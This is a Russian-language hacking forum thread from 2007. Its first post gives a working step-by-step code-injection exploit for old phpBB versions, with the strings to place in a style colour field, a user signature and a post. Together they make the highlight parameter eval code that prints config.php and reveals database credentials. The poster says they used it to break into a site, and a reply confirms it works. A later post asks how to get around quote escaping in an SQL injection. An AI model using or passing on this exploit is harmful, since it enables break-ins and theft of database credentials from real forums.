phpbb(highlight)

Discussion in 'Песочница' started by fly, 6 Jul 2007.

  1. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    Может кому пригодится .
    Давно ломал сайт , там стоял старый phpbb . Через базу не смог проделать инклуд. И все остальные способы не помогли. И вот нарыл такой способ.

    Идем Administration Panel --> Styles Admin --> Management --> subSilver --> Edit
    Затем находим "Font Colour 3" и вместо 6цифр_цвета:
    Code:
    "'./*"
    Далее идем в админский профайл или любой другой юзерский и в поле подписи Signature вставляем:
    Code:
    "$fd=fopen($phpbb_root_path.'config.php','rb');while(!feof($fd)){echo htmlspecialchars(fgets($fd));}"
    Сохраняем!
    После этого создаем в любом топике сообщение с текстом:
    Code:
    "*/var_dump(eval($user_sig)).flush().die().'"
    Ну и всем известный способ --- допишем к топику &highlight=1 ---в моем случае я получил пасс и логин от базы.
     
    #1 fly, 6 Jul 2007
    Last edited: 6 Jul 2007
  2. NApoleonchik

    NApoleonchik Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    79
    Likes Received:
    39
    Reputations:
    4
    Круто. Сам испробовал - работает!
     
  3. _SploiT_

    _SploiT_ Elder - Старейшина

    Joined:
    9 May 2007
    Messages:
    88
    Likes Received:
    16
    Reputations:
    1
    А версию точно не помнишь?
     
  4. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    <=2.0.15
     
  5. che_ha

    che_ha New Member

    Joined:
    8 Aug 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет.
    Я извиняюсь что не в тему , просто не хотел создавать лишний раз тему.
    Нашел на phpBB MS SQL-injection.Могу провести несколько запросов где не исползуються знаки ( '," ) , всегда когда вставлю этот знак ,фильтр перед ним встявляет ( \ ),итоге Incorrect syntax near '\'.

    Ничего не смог придумать , может вы знаете какие-нибудь решение ?
    СПС.
     
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Читай статьи.